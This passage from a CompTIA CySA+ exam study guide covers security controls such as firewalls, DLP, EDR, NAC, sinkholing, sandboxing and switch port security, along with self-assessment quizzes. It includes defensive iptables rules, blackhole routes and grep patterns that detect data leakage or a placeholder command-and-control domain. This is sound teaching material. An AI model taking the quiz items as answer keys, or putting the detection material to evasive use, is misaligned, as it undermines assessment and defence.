Emanations | A mechanism implemented in many devices or applications that gives the user who uses the backdoor unlimited access to the device
Buffer overflow | Software that is transmitted across a network to be executed on a local system
Mobile code | Electromagnetic signals that are emitted by an electronic device
Backdoor/trapdoor | Occurs when the amount of data that is submitted to an application is larger than the buffer can handle
7. ______________________________ is a technology
developed by Cisco that is supported by all major vendors
and can be used to collect and subsequently export IP traffic
accounting information.
8. List at least two parts of a Syslog message.
9. Match the following terms with their definitions.
Terms | Definitions
IPS | System that can alert when a security event occurs
WAF | A server, application, or appliance that acts as an intermediary for requests from clients seeking resources from servers
Proxy | System that can take an action when a security event occurs
IDS | System that examines all web input before processing and applies rule sets to an HTTP conversation
10. ______________________ enables you to verify the
source of an e-mail.
Chapter 12
Implementing Configuration Changes to Existing Controls to Improve Security
This chapter covers the following topics related to Objective 3.2
(Given a scenario, implement configuration changes to existing
controls to improve security) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
Permissions: Discusses the importance of proper permissions
management.
Whitelisting: Covers the process of whitelisting and its
indications.
Blacklisting: Describes a blacklisting process used to deny access.
Firewall: Identifies key capabilities of various firewall platforms.
Intrusion prevention system (IPS) rules: Discusses rules
used to automate response.
Data loss prevention (DLP): Covers the DLP process used to
prevent exfiltration.
Endpoint detection and response (EDR): Describes a
technology that addresses the need for continuous monitoring.
Network access control (NAC): Identifies the processes used by
NAC technology.
Sinkholing: Discusses the use of this networking tool.
Malware signatures: Describes the importance of malware
signatures and development/rule writing.
Sandboxing: Reviews the use of this software virtualization
technique to isolate apps from critical system resources.
Port security: Covers the role of port security in preventing attacks.
In many cases, security monitoring data indicates a need to
change or implement new controls to address new threats.
These changes might be small configuration adjustments to a
security device or they might include large investments in new
technology. Regardless of the scope, these actions should be driven by the threat at hand, and the controls should be subjected to the same cost/benefit analysis as all other organizational activities.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 12 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
12-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 12-1 "Do I Know This Already?" Foundation Topics Section-to-Question Mapping

Foundation Topics Section | Question
Permissions | 1
Whitelisting | 2
Blacklisting | 3
Firewall | 4
Intrusion Prevention System (IPS) Rules | 5
Data Loss Prevention (DLP) | 6
Endpoint Detection and Response (EDR) | 7
Network Access Control (NAC) | 8
Sinkholing | 9
Malware Signatures | 10
Sandboxing | 11
Port Security | 12
1. Which of the following is an example of a right and not a
permission?
1. Read access to a file
2. Ability to delete a file
3. Ability to reset passwords
4. Ability to change the permissions of a file
2. When you allow a file type to the exclusion of all other file types, you have created what?
1. Whitelist
2. Access list
3. Blacklist
4. Graylist
3. Which of the following requires the most effort to maintain?
1. Whitelist
2. Access list
3. Blacklist
4. Graylist
4. Which of the following is a category of devices that attempt
to address traffic inspection and application awareness
shortcomings of a traditional stateful firewall?
1. NGFW
2. Bastion host
3. Three-legged firewall
4. Proxy
5. Which of the following is a type of IPS and is an expert system that uses a knowledge base, an inference engine, and rule-based programming?
1. Rule-based
2. Signature-based
3. Heuristics-based
4. Error-based
6. Preventing data exfiltration is the role of which of the
following?
1. Trend analysis
2. DLP
3. NAC
4. Port security
7. Which of the following shifts security from a reactive threat
approach to one that can detect and prevent threats before
they reach the organization?
1. NAC
2. DAC
3. EDR
4. DLP
8. Which of the following is a service that goes beyond
authentication of the user and includes examination of the
state of the computer the user is introducing to the network
when making a remote-access or VPN connection to the
network?
1. NAC
2. DAC
3. EDR
4. DLP
9. Which of the following can be used to prevent a
compromised host from communicating back to the
attacker?
1. Sinkholing
2. DNSSec
3. NAC
4. Port security
10. Which of the following could be a filename or could be some
series of characters that can be tied uniquely to the
malware?
1. Key
2. Signature
3. Fingerprint
4. Scope
11. Which of the following allows you to run a possibly
malicious program in a safe environment so that it doesn’t
infect the local system?
1. Sandbox
2. Secure memory
3. Secure enclave
4. Container
12. Which of the following is referred to as Layer 2 security?
1. Sandbox
2. Port security
3. Encoding
4. Subnetting
FOUNDATION TOPICS
PERMISSIONS
Permissions are granted or denied at the file, folder, or other
object level. Common permission types include Read, Write,
and Full Control. Data custodians or administrators will grant
users permissions on a file or folder based on the file owner’s
request to do so.
Rights allow administrators to assign specific privileges and
logon rights to groups or users. Rights manage who is allowed
to perform certain operations on an entire computer or within a
domain, rather than on a particular object within a computer.
While user permissions are granted by an object’s owner, user
rights are assigned using a computer’s local security policy or a
domain security policy. User rights apply to user accounts,
while permissions apply to objects.
Rights include the ability to log on to a system interactively,
which is a logon right, or the ability to back up files, which is
considered a privilege. User rights are divided into two
categories: privileges and logon rights. Privileges are the right of
an account, such as a user or group account, to perform various
system-related operations on the local computer, such as
shutting down the system, loading device drivers, or changing
the system time. Logon rights control how users are allowed
access to the computer, including logging on locally or through
a network connection or whether as a service or as a batch job.
Conflicts can occur in situations where the rights that are
required to administer a system overlap the rights of resource
ownership. When rights conflict, a privilege overrides a
permission.
WHITELISTING AND BLACKLISTING
Whitelisting occurs when a list of acceptable e-mail
addresses, Internet addresses, websites, applications, or some
other identifier is configured as good senders or as allowed to
send. Blacklisting identifies bad senders. Graylisting is
somewhere in between the two, listing entities that cannot be
identified as whitelist or blacklist items. In the case of
graylisting, the new entity must pass through a series of tests to
determine whether it will be whitelisted or blacklisted.
Whitelisting, blacklisting, and graylisting are commonly used with spam filtering tools. But there are other uses for whitelists and blacklists as well. They are used in routers to enforce ACLs and in switches to enforce port security.
Application Whitelisting and Blacklisting
Application whitelists are lists of allowed applications (with all
others excluded), and blacklists are lists of prohibited
applications (with all others allowed). It is important to control
the types of applications that users can install on their
computers. Some application types can create support issues,
and others can introduce malware. It is possible to use Windows
Group Policy to restrict the installation of software on network
computers, as illustrated in Figure 12-1. Using Windows Group
Policy is only one option, and each organization should select a
technology to control application installation and usage in the
network.
Figure 12-1 Software Restrictions
Input Validation
Input validation is the process of checking all input for things such as proper format and proper length. In many cases, these validators use either blacklisting or whitelisting of characters or patterns. Blacklisting looks for characters or patterns to block, which can inadvertently reject legitimate requests. Whitelisting looks for allowable characters or patterns and permits only those. The length of the input should also be checked and verified to prevent buffer overflows.
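In shell terms, a whitelist-style validator might look like the following sketch, in the same style as the earlier password script; the allowed character set and length limit are illustrative assumptions:

# Accept only 1 to 32 alphanumeric characters; reject everything else
if [[ "$input" =~ ^[A-Za-z0-9]{1,32}$ ]] ; then
    echo "Input accepted"
else
    echo "Fail: input contains disallowed characters or is too long."
fi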
FIREWALL
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” discussed firewall logs and Chapter 8, “Security
Solutions for Infrastructure Management,” discussed the
various architectures used in firewalls; at this point we need to
look a little more closely at firewall types and their placement
for effective operation. Firewalls can be software programs installed on server or client operating systems, or appliances that run their own operating system. In either case, the job of a firewall is to inspect and control the type of traffic allowed.
NextGen Firewalls
Next-generation firewalls (NGFWs) are a category of
devices that attempt to address traffic inspection and
application awareness shortcomings of a traditional stateful
firewall, without hampering the performance. Although unified
threat management (UTM) devices also attempt to address
these issues, they tend to use separate internal engines to
perform individual security functions. This means a packet may
be examined several times by different engines to determine
whether it should be allowed into the network.
NGFWs are application aware, which means they can
distinguish between specific applications instead of allowing all
traffic coming in via typical web ports. Moreover, they examine
packets only once, during the deep packet inspection phase
(which is required to detect malware and anomalies). The
following are some of the features provided by NGFWs:
Nondisruptive inline configuration (which has little impact on
network performance)
Standard first-generation firewall capabilities, such as network
address translation (NAT), stateful protocol inspection (SPI), and
virtual private networking
Integrated signature-based IPS engine
Application awareness, full stack visibility, and granular control
Ability to incorporate information from outside the firewall, such as
directory-based policy, blacklists, and whitelists
Upgrade path to include future information feeds and security
threats and SSL/TLS decryption to enable identifying undesirable
encrypted applications
An NGFW can be placed inline or out-of-path. Out-of-path
means that a gateway redirects traffic to the NGFW, while inline
placement causes all traffic to flow through the device. Figure
12-2 shows the two placement options for NGFWs.
FIGURE 12-2 Placement of an NGFW
Table 12-2 lists the advantages and disadvantages of NGFWs.
Table 12-2 Advantages and Disadvantages of NGFWs

Advantages | Disadvantages
Provides enhanced security | Is more involved to manage than a standard firewall
Provides integration between security services | Leads to reliance on a single vendor
May save costs on appliances | Performance can be impacted
Host-Based Firewalls
A host-based firewall resides on a single host and is
designed to protect that host only. Many operating systems
today come with host-based (or personal) firewalls. Many
commercial host-based firewalls are designed to focus attention
on a particular type of traffic or to protect a certain application.
On Linux-based systems, a common host-based firewall is
iptables, which replaces a previous package called ipchains. It
has the ability to accept or drop packets. You create firewall
rules much as you create an access list on a router. The
following is an example of a rule set:
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
iptables -A INPUT -i eth1 -s 172.16.0.0/12 -j DROP
This rule set blocks all incoming traffic sourced from the 192.168.0.0/24, 10.0.0.0/8, or 172.16.0.0/12 networks. All three are private IP address ranges. It is quite common to block
incoming traffic from the Internet that has a private IP address
as its source, as this usually indicates that IP spoofing is
occurring. In general, the following IP address ranges should be
blocked as traffic sourced from these ranges is highly likely to be
spoofed:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
224.0.0.0/4
240.0.0.0/4
127.0.0.0/8
The 224.0.0.0/4 range covers multicast traffic, and the
127.0.0.0/8 range covers traffic from a loopback IP address.
You may also want to include the APIPA 169.254.0.0/16 range as well, as it is the range in which some computers give themselves IP addresses when the DHCP server cannot be reached. On a Microsoft computer, you can use Windows Defender Firewall to block these ranges.
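Extending the earlier iptables rule set to cover the rest of this list might look like the following sketch, assuming eth1 is the Internet-facing interface:

iptables -A INPUT -i eth1 -s 192.168.0.0/16 -j DROP     # full private range
iptables -A INPUT -i eth1 -s 224.0.0.0/4 -j DROP        # multicast
iptables -A INPUT -i eth1 -s 240.0.0.0/4 -j DROP        # reserved
iptables -A INPUT -i eth1 -s 127.0.0.0/8 -j DROP        # loopback
iptables -A INPUT -i eth1 -s 169.254.0.0/16 -j DROP     # APIPA/link-local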
Table 12-3 lists the pros and cons of the various types of
firewalls.
Table 12-3 Pros and Cons of Firewall Types

Packet filtering firewalls
Advantages: Best performance
Disadvantages: Cannot prevent IP spoofing, attacks that are specific to an application, attacks that depend on packet fragmentation, or attacks that take advantage of the TCP handshake

Circuit-level proxies
Advantages: Secure addresses from exposure; support a multiprotocol environment; allow for comprehensive logging
Disadvantages: Slight impact on performance; may require a client on the computer (SOCKS proxy); no application layer security

Application-level proxies
Advantages: Understand the details of the communication process at Layer 7 for the application
Disadvantages: Big impact on performance

Kernel proxy firewalls
Advantages: Inspect the packet at every layer of the OSI model; don't impact performance as application layer proxies do
Note
Other firewalls and associated network architecture approaches were covered in
Chapter 8.
INTRUSION PREVENTION SYSTEM (IPS)
RULES
As you learned earlier, some IPSs can be rule-based. Chapter 3, "Vulnerability Management Activities," and Chapter 11 covered these IPSs in more detail; Chapter 11 also covered rule writing.
DATA LOSS PREVENTION (DLP)
Data loss prevention (DLP) software attempts to prevent
data leakage. It does this by maintaining awareness of actions
that can and cannot be taken with respect to a document. For
example, DLP software might allow printing of a document but
only at the company office. It might also disallow sending the
document through e-mail. DLP software uses ingress and egress
filters to identify sensitive data that is leaving the organization
and can prevent such leakage. Another scenario might be the
release of product plans that should be available only to the
Sales group. You could set the following policy for that
document:
It cannot be e-mailed to anyone other than Sales group members.
It cannot be printed.
It cannot be copied.
There are two locations where you can implement this policy:
Network DLP: Installed at network egress points near the
perimeter, network DLP analyzes network traffic.
Endpoint DLP: Endpoint DLP runs on end-user workstations or
servers in the organization.
You can use both precise and imprecise methods to determine
what is sensitive:
Precise methods: These methods involve content registration
and trigger almost zero false-positive incidents.
Imprecise methods: These methods can include keywords,
lexicons, regular expressions, extended regular expressions,
metadata tags, Bayesian analysis, and statistical analysis.
The value of a DLP system resides in the level of precision with
which it can locate and prevent the leakage of sensitive data.
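As a simple illustration of an imprecise method, a regular expression can flag files containing strings shaped like U.S. Social Security numbers. The pattern and path below are illustrative; real DLP engines combine such patterns with context checks to reduce false positives:

$ grep -rlE '\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b' /srv/fileshare/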
ENDPOINT DETECTION AND RESPONSE
(EDR)
Endpoint detection and response (EDR) is a proactive
endpoint security approach designed to supplement existing
defenses. This advanced endpoint approach shifts security from
a reactive threat approach to one that can detect and prevent
threats before they reach the organization. It focuses on three
essential elements for effective threat prevention: automation,
adaptability, and continuous monitoring.
The following are some examples of EDR products:
FireEye Endpoint Security
Carbon Black CB Response
Guidance Software EnCase Endpoint Security
Cybereason Total Enterprise Protection
Symantec Endpoint Protection
RSA NetWitness Endpoint
The advantage of EDR systems is that they provide continuous
monitoring. The disadvantage is that the software’s use of
resources could impact performance of the device.
NETWORK ACCESS CONTROL (NAC)
Network access control (NAC) is a service that goes beyond
authentication of the user and includes examination of the state
of the computer the user is introducing to the network when
making a remote-access or VPN connection to the network.
The Cisco world calls these services Network Admission Control
(NAC), and the Microsoft world calls them Network Access
Protection (NAP). Regardless of the term used, the goals of the
features are the same: to examine all devices requesting
network access for malware, missing security updates, and any
other security issues the devices could potentially introduce to
the network.
Figure 12-3 shows the steps that occur in Microsoft NAP. The
health state of the device requesting access is collected and sent
to the Network Policy Server (NPS), where the state is
compared to requirements. If requirements are met, access is
granted.
FIGURE 12-3 NAC
The limitations of using NAC and NAP are as follows:
They work well for company-managed computers but less well for
guests.
They tend to react only to known threats and not to new threats.
The return on investment is still unproven.
Some implementations involve confusing configuration.
Access decisions can be of the following types:
Time based: A user might be allowed to connect to the network
only during specific times of day.
Rule based: A user might have his access controlled by a rule such
as “all devices must have the latest antivirus patches installed.”
Role based: A user may derive her network access privileges from
a role she has been assigned, typically through addition to a specific
security group.
Location based: A user might have one set of access rights when
connected from another office and another set when connected
from the Internet.
Quarantine/Remediation
If you examine step 5 in the process shown in Figure 12-3, you
see that a device that fails examination is placed in a restricted
network until it can be remediated. A remediation server
addresses the problems discovered on the device. It may remove
the malware, install missing operating system updates, or
update virus definitions. When the remediation process is
complete, the device is granted full access to the network.
Agent-Based vs. Agentless NAC
NAC can be deployed with or without agents on devices. An
agent is software used to control and interact with a device.
Agentless NAC is the easiest to deploy but offers less control
and fewer inspection capabilities. Agent-based NAC can
perform deep inspection and remediation at the expense of
additional software on the endpoint.
Both agent-based and agentless NAC can be used to mitigate the
following issues:
Malware
Missing OS patches
Missing anti-malware updates
802.1X
Another form of network access control is 802.1X, which uses the Extensible Authentication Protocol (EAP). 802.1X is a standard that defines a framework for centralized port-based authentication.
It can be applied to both wireless and wired networks and uses
three components:
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is
attempting to access the network
Authentication server: The centralized device that performs
authentication
The role of the authenticator can be performed by a wide variety
of network access devices, including remote-access servers
(both dial-up and VPN), switches, and wireless access points.
The role of the authentication server can be performed by a
Remote Authentication Dial-in User Service (RADIUS) or
Terminal Access Controller Access Control System Plus
(TACACS+) server. The authenticator requests credentials from
the supplicant and, upon receipt of those credentials, relays
them to the authentication server, where they are validated.
Upon successful verification, the authenticator is notified to
open the port for the supplicant to allow network access. Figure
12-4 illustrates this process.
Figure 12-4 802.1X Architecture
While RADIUS and TACACS+ perform the same roles, they
have different characteristics. These differences must be taken
into consideration when choosing a method. Keep in mind also
that while RADIUS is a standard, TACACS+ is Cisco
proprietary. Table 12-4 compares them.
Table 12-4 RADIUS vs. TACACS+

Category | RADIUS | TACACS+
Transport protocol | Uses UDP, which may result in faster response | Uses TCP, which offers more information for troubleshooting
Confidentiality | Encrypts only the password in the access request packet | Encrypts the entire body of the packet but leaves a standard TACACS+ header for troubleshooting
Authentication and authorization | Combines authentication and authorization | Separates authentication, authorization, and accounting processes
Supported Layer 3 protocols | Does not support Apple Remote Access protocol, NetBIOS Frame Protocol Control protocol, or X.25 PAD connections | Supports all protocols
Devices | Does not support securing the available commands on routers and switches | Supports securing the available commands on routers and switches
Traffic | Creates less traffic | Creates more traffic
Among the issues 802.1X port-based authentication can help
mitigate are the following:
Network DoS attacks
Device spoofing (because it authenticates the user, not the device)
SINKHOLING
A sinkhole is a router designed to accept and analyze attack
traffic. Sinkholes can be used to do the following:
Draw traffic away from a target
Monitor worm traffic
Monitor other malicious traffic
During an attack, a sinkhole router can be quickly configured to
announce a route to the target’s IP address that leads to a
network or an alternate device where the attack can be safely
studied. Moreover, sinkholes can also be used to prevent a
compromised host from communicating back to the attacker.
Finally, they can be used to prevent a worm-infected system
from infecting other systems. Sinkholes can be used to mitigate
the following issues:
Worms
Compromised devices communicating with command and control
(C&C) servers
External attacks targeted at a single device inside the network
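On a Linux router pressed into service as a simple sinkhole, the redirection can be a one-line route change. In the following sketch, 203.0.113.50 is a documentation placeholder for the attacker's address, and 10.0.99.5 is a hypothetical analysis host:

# Silently drop all traffic destined for the attacker's address
$ ip route add blackhole 203.0.113.50/32

# Or divert that traffic to an analysis host where it can be safely studied
$ ip route add 203.0.113.50/32 via 10.0.99.5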
MALWARE SIGNATURES
While placing malware in a sandbox or isolation area for study
is a safe way of reverse engineering and eventually disarming
the malware, the best defense is to identify and remove malware
when it enters the network before it infects the devices.
To do this, network security devices such as SIEM, IPS, IDS,
and firewall systems must be able to recognize the malware
when it is still contained in network packets before it reaches
devices. This requires identifying a malware signature. This
could be a filename or it could be some series of characters that
can be tied uniquely to the malware.
You learned about signature-based IPS/IDS systems earlier.
You may remember that these systems and rule-based systems
both rely on rules that instruct the security device to be on the
lookout for certain character strings in a packet.
Development/Rule Writing
One of the keys to successful signature matching and therefore
successful malware prevention is proper rule writing, which is
in the development realm. Just as automation is driving
network technicians to learn basic development theory and rule
writing, so is malware signature identification. Rule creation
does not always rely on the name of the malicious file. It also
can be based on behavior that is dangerous in and of itself.
Examples of rules or behavior that can indicate that a system is
infected by malware are as follows:
A system process that drops various malware executables (e.g.,
Dropper, a kind of Trojan that has been designed to “install” some
sort of malware)
A system process that reaches out to random, and often foreign, IP
addresses/domains
Repeated attempts to monitor or modify key system settings such as
registry keys
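A rudimentary sketch of string-based signature matching uses the strings and grep utilities; the filename and the indicator being searched for are hypothetical:

# Extract printable strings from a suspect binary and look for a known C&C domain
$ strings suspect.bin | grep -i "c2.evil-example.net"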
SANDBOXING
Chapter 11 briefly introduced sandboxing. You can use a
sandbox to run a possibly malicious program in a safe
environment so that it doesn’t infect the local system.
By using sandboxing tools, you can execute malware executable
files without allowing the files to interact with the local system.
Some sandboxing tools also allow you to analyze the
characteristics of an executable. This is not possible with some
malware because it is specifically written to do different things
if it detects that it’s being executed in a sandbox.
In many cases, sandboxing tools operate by sending a file to a
special server that analyzes the file and sends you a report on it.
Sometimes this is a free service, but in many instances it is not.
Some examples of these services include the following:
Sandboxie
Akana
Binary Guard True Bare Metal
BitBlaze Malware Analysis Service
Comodo Automated Analysis System and Valkyrie
Deepviz Malware Analyzer
Detux Sandbox (Linux binaries)
Another option for studying malware is to set up a “sheep dip”
computer. This is a system that has been isolated from the other
systems and is used for analyzing suspect files and messages for
malware. You can take measures such as the following on a
sheep dip system:
Install port monitors to discover ports used by the malware.
Install file monitors to discover what changes may be made to files.
Install network monitors to identify what communications the
malware may attempt.
Install one or more antivirus programs to perform malware
analysis.
Often these sheep dip systems are combined with antivirus
sensor systems to which malicious traffic is reflected for
analysis. The safest way to perform reverse engineering and
malware analysis is to prepare a test bed. Doing so involves the
following steps:
Step 1. Install virtualization software on the host.
Step 2. Create a VM and install a guest operating system on
the VM.
Step 3. Isolate the system from the network by ensuring that the NIC is set to host-only mode.
Step 4. Disable shared folders and enable guest isolation on
the VM.
Step 5. Copy the malware to the guest operating system.
Also, you need isolated network services for the VM, such as
DNS. It may also be beneficial to install multiple operating
systems in both patched and unpatched configurations. Finally,
you can make use of virtualization snapshots and reimaging
tools to wipe and rebuild machines quickly. Once the test bed is
set up, you also need to install a number of other tools to use on
the isolated VM, including the following:
Imaging tools: You need these tools to take images for forensics
and prosecution procedures. Examples include SafeBack Version
2.0 and Linux dd.
File/data analysis tools: You need these tools to perform static
analysis of potential malware files. Examples include PeStudio and
PEframe.
Registry/configuration tools: You need these tools to help identify infected settings in the registry and to identify the last-saved settings. Examples include Microsoft's Sysinternals Autoruns and Silent Runners.vbs.
Sandbox tools: You need these tools for manual malware analysis
in a safe environment.
Log analyzers: You need these tools to extract log files. Examples
include AWStats and Apache Log Viewer.
Network capture tools: You need these tools to understand how
the malware uses the network. Examples include Wireshark and
Omnipeek.
While the use of virtual machines to investigate the effects of malware is quite common, you should know that some well-written malware can break out of a VM relatively easily, making this approach problematic.
PORT SECURITY
Port security applies to ports on a switch or wireless home
router, and because it relies on monitoring the MAC addresses
of the devices attached to the switch ports, it is considered to be
Layer 2 security. While disabling any ports that are not in use is
always a good idea, port security goes a step further and allows
you to keep a port enabled for legitimate devices while
preventing its use by illegitimate devices. You can apply two
types of restrictions to a switch port:
Restrict the specific MAC addresses allowed to send on the port.
Restrict the total number of different MAC addresses allowed to
send on the port.
By specifying which specific MAC addresses are allowed to send
on a port, you can prevent unknown devices from connecting to
the switch port. Port security is applied at the interface level.
The interface must be configured as an access port, so first you
ensure that it is by executing the following command:
Switch(config)# int fa0/1
Switch(config-if)# switchport mode access
In order for port security to function, you must enable the
feature. To enable it on a switchport, use the following
command at the interface configuration prompt:
Switch(config-if)# switchport port-security
Limiting MAC Addresses
Now you need to define the maximum number of MAC
addresses allowed on the port. In many cases today, IP phones
and computers share a switchport (the computer plugs into the
phone, and the phone plugs into the switch), so here you want
to allow a maximum of two:
Switch(config-if)# switchport port-security maximum 2
Next, you define the two allowed MAC addresses, in this case,
aaaa.aaaa.aaaa and bbbb.bbbb.bbbb:
Switch(config-if)# switchport port-security mac-address aaaa.aaaa.aaaa
Switch(config-if)# switchport port-security mac-address bbbb.bbbb.bbbb
Finally, you set an action for the switch to take if there is a
violation. By default, the action is to shut down the port. You
can also set it to restrict, which doesn’t shut down the port but
prevents the violating device from sending any data. In this
case, set it to restrict:
Switch(config-if)# switchport port-security violation restrict
Now you have secured the port to allow only the two MAC
addresses required by the legitimate user: one for his phone and
the other for his computer. Now you just need to gather all the
MAC addresses for all the phones and computers, and you can
lock down all the ports. Boy, that’s a lot of work! In the next
section, you’ll see that there is an easier way.
Implementing Sticky MAC
Sticky MAC is a feature that allows a switch to learn the MAC
addresses of the devices currently connected to the port and
convert them to secure MAC addresses (the only MAC addresses
allowed to send on the port). All you need to do is specify the
keyword sticky in the command where you designate the MAC
addresses, and you’re done. You still define the maximum
number, and Sticky MAC converts up to that number of
addresses to secure MAC addresses. Therefore, you can secure all ports by specifying only the number allowed on each port and using the sticky keyword in the switchport port-security mac-address command. To secure a single port, execute the following code:
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security maximum 2
Switch(config-if)# switchport port-security mac-address sticky
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 12-5
lists a reference of these key topics and the page numbers on
which each is found.
Table 12-5 Key Topics in Chapter 12

Key Topic Element | Description | Page Number
Figure 12-1 | Software restrictions | 382
Figure 12-2 | Placement of an NGFW | 384
Table 12-2 | Advantages and disadvantages of NGFWs | 384
Table 12-3 | Pros and cons of firewall types | 385
Figure 12-3 | NAC | 388
Bulleted list | Access decision types | 388
Figure 12-4 | 802.1X architecture | 390
Table 12-4 | RADIUS vs. TACACS+ | 390
Section | Sinkholing | 391
Step list | Preparing a test bed | 393
Bulleted list | Tools for sandboxing and reverse engineering | 393
Section | Port security | 394
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
permissions
rights
whitelisting
blacklisting
firewalls
next-generation firewalls (NGFWs)
host-based firewall
data loss prevention (DLP)
endpoint detection and response (EDR)
network access control (NAC)
802.1X
supplicant
authenticator
authentication server
sinkhole
port security
sticky MAC
REVIEW QUESTIONS
1. Granting someone the ability to reset passwords is the
assignment of a(n) ________.
2. List at least one disadvantage of packet filtering firewalls.
3. Match the following terms with their definitions.
Terms | Definitions
Screened subnet | Resides on a single host and is designed to protect that host only
NGFW | Linux host-based firewall
Host-based firewall | A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering the performance
iptables | Architecture where two firewalls are used, and traffic must be inspected at both firewalls before it can enter the internal network
4. List at least two advantages of circuit-level proxies.
5. ___________________ is installed at network egress
points near the perimeter, to prevent data exfiltration.
6. Match the following terms with their definitions.
Terms | Definitions
802.1X | Microsoft's name for NAC services
Network Access Protection (NAP) | NAC that can perform deep inspection and remediation at the expense of additional software on the endpoint
Agent-based | Type of rule where a user might have one set of access rights when connected from another office and another set when connected from the Internet
Location-based | Defines a framework for centralized port-based authentication
7. List at least two disadvantages of RADIUS.
8. _______________ is a system that has been isolated
from the other systems and is used for analyzing suspect
files and messages for malware.
9. Match the following terms with their definitions.
Terms | Definitions
Imaging tools | Used to perform static analysis of potential malware files
Registry/configuration tools | Used to take images for forensics and prosecution procedures
File/data analysis tools | Used to understand how the malware uses the network
Packet capture tools | Used to help identify infected settings in the registry and to identify the last-saved settings
10. List at least two measures that should be taken with sheep
dip systems.
Chapter 13
The Importance of Proactive Threat Hunting
This chapter covers the following topics related to Objective 3.3
(Explain the importance of proactive threat hunting) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Establishing a hypothesis: Discusses the importance of this first
step in threat hunting.
Profiling threat actors and activities: Covers the process and its application.
Threat hunting tactics: Describes hunting techniques, including
executable process analysis.
Reducing the attack surface area: Identifies what constitutes
the attack surface.
Bundling critical assets: Discusses the reasoning behind this
technique.
Attack vectors: Defines various attack vectors.
Integrated intelligence: Describes a technology that addresses
the need for shared intelligence.
Improving detection capabilities: Identifies methods for
improving detection.
Threat hunting is a security approach that places emphasis on
actively searching for threats rather than sitting back and
waiting to react. It is sometimes referred to as offensive in
nature rather than defensive. This chapter explores threat
hunting and details what it involves.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these eight self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 13-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 13-1 "Do I Know This Already?" Foundation Topics Section-to-Question Mapping

Foundation Topics Section | Question
Establishing a Hypothesis | 1
Profiling Threat Actors and Activities | 2
Threat Hunting Tactics | 3
Reducing the Attack Surface Area | 4
Bundling Critical Assets | 5
Attack Vectors | 6
Integrated Intelligence | 7
Improving Detection Capabilities | 8
1. Which of the following is the first step in the scientific
method?
1. Ask a question.
2. Conduct an experiment.
3. Make a conclusion.
4. Establish a hypothesis.
2. The U.S. Federal Bureau of Investigation (FBI) has
identified all but which of the following categories of threat
actors?
1. Hacktivists
2. Organized crime
3. State sponsors
4. Terrorist groups
3. Which of the following might identify a device that has been
compromised with malware?
1. Executable process analysis
2. Regression analysis
3. Risk management
4. Polyinstantiation
4. Which of the following allows you to prevent any changes to
the device configuration, even by users who formerly had the
right to configure the device?
1. Configuration lockdown
2. System hardening
3. NAC
4. DNSSec
5. Which of the following is a measure of how freely data can
be handled?
1. Transparency
2. Sensitivity
3. Value
4. Quality
6. Which metric included in the CVSS Attack Vector metric
group means that the attacker can cause the vulnerability
from any network?
1. B
2. N
3. L
4. A
7. Which of the following focuses on merging cybersecurity
and physical security to aid governments in dealing with
emerging threats?
1. OWASP
2. NIST
3. IIC
4. PDA
8. In which step of Deming’s Plan–Do–Check–Act cycle are
the results of the implementation analyzed to determine
whether it made a difference?
1. Plan
2. Do
3. Check
4. Act
FOUNDATION TOPICS
ESTABLISHING A HYPOTHESIS
The first phase of proactive threat hunting is to establish a
hypothesis about the aims and nature of a potential attack,
similar to establishing a hypothesis when following the
scientific method, shown in Figure 13-1. When security
incidents are occurring, and even when they are not occurring at
the current time, security professionals must anticipate attacks
and establish a hypothesis regarding the attack aims and
method as soon as possible. As you may already know from the
scientific method, making an educated guess about the aims
and nature of an attack is the first step. Then you conduct
experiments (or gather more network data) to either prove or
disprove the hypothesis. Then the process starts again with a
new hypothesis if the old one has been disproved.
Figure 13-1 Scientific Method
For example, if an attacker is probing your network for
unknown reasons, you might follow the method in this way:
1. Why is he doing this? What is his aim?
2. He is trying to perform a port scan.
3. Monitor and capture the traffic he sends to the network.
4. Look for the presence of packets that have been crafted by the
hacker compared to those that are the result of the normal TCP
three-way handshake.
5. These packet types are not present; therefore, his intent is not to
port scan.
At this point another hypothesis will be suggested and the
process begins again.
PROFILING THREAT ACTORS AND
ACTIVITIES
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or absent ACL
is a threat actor. Keep in mind, though, that threat actors can
discover and/or exploit vulnerabilities. Not all threat actors will
actually exploit an identified vulnerability. While you learned
about basic threat actors in Chapter 1, “The Importance of
Threat Data and Intelligence,” the U.S. Federal Bureau of
Investigation (FBI) has identified three categories of threat
actors:
Organized crime groups primarily threatening the financial services
sector and expanding the scope of their attacks
State sponsors or advanced persistent threats (APTs), usually
foreign governments, interested in pilfering data, including
intellectual property and research and development data from
major manufacturers, government agencies, and defense
contractors
Terrorist groups that want to impact countries by using the Internet
and other networks to disrupt or harm the viability of a society by
damaging its critical infrastructure
While there are other, less organized groups out there, law
enforcement considers these three groups to be the primary
threat actors. However, organizations should not totally
